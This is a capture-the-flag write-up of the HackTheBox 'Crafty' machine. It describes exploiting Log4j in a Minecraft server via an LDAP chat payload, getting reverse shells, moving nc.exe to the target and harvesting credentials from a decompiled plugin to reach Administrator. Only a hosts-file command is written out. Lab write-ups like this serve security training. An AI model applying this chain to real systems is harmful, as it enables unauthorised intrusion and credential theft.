Crafty HTB Writeup | HacktheBox

Introduction

In this post, Let’s see how to CTF Crafty from HTB, If you have any doubts comment down below 👇🏾

Hacking Phases in Crafty

  • Add IP to /etc/hosts
  • Nmap Scan
  • Site Enumeration
  • Credential Harvest
  • User Enumeration
  • Privilege Escalation

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.

Let’s Hack Crafty HTB 😌

https://www.youtube.com/@techyrick-/videos

Nmap Scan

To kick things off, I start our exploration by running an Nmap scan.

Port 25565 indicates the presence of a Minecraft server. Next, I add “crafty.htb” to my host file along with the machine’s IP address using this command:

echo "10.10.11.249 crafty.htb" >> /etc/hosts

Website Enumeration

When I visited “crafty.htb”, I found a Minecraft introduction page.

To connect to the server, I need to download the Minecraft client on my Kali system. I found a helpful link to guide me through installing Minecraft on Linux.

I followed the video and successfully installed the Minecraft client. After logging in with my account, I was able to see the following screen.

Clicking on “Multiplayer” allowed me to enter the server.

After searching online, I found a Log4j Minecraft Remote Code Execution (REC) vulnerability. Thanks to Kozmer, I obtained a proof of concept (PoC) for this vulnerability.

POC

Since I was going to pentest a Windows machine, I modified the cmd variable as follows.

Then, I ran this PoC and obtained an LDAP URL.

I also opened a reverse shell.

Back in the game, I could send chat messages to other players.

User Enum

So, I could simply send the LDAP URL payload to obtain a reverse shell with my Kali machine.

And it worked! Finally, I got the user flag.

Privilege Escalation

While exploring the machine, I found an interesting .jar file in C:\Users\svc_minecraft\server\plugins.

To move this file to my Kali for decompilation, I attempted to use nc.exe for the transfer. To proceed, I needed to first move nc.exe to this box.

I used the following commands to move this .jar file:

By opening this file with JD-GUI, I found a credential in the “Playercounter.class”.

And I decided to use this credential to open a new reverse shell as the user Administrator.

It worked, and I also obtained the root flag.

Conclusion

In conclusion, the Crafty box provided an engaging challenge, showcasing various aspects of penetration testing and exploitation.

From identifying Minecraft server vulnerabilities to leveraging LDAP payloads for reverse shells, the box offered a diverse set of tasks.

Through careful exploration and exploitation of vulnerabilities, I was able to escalate privileges, ultimately gaining access to both user and root flags. This experience reinforced my understanding of security vulnerabilities and the importance of thorough testing and mitigation strategies.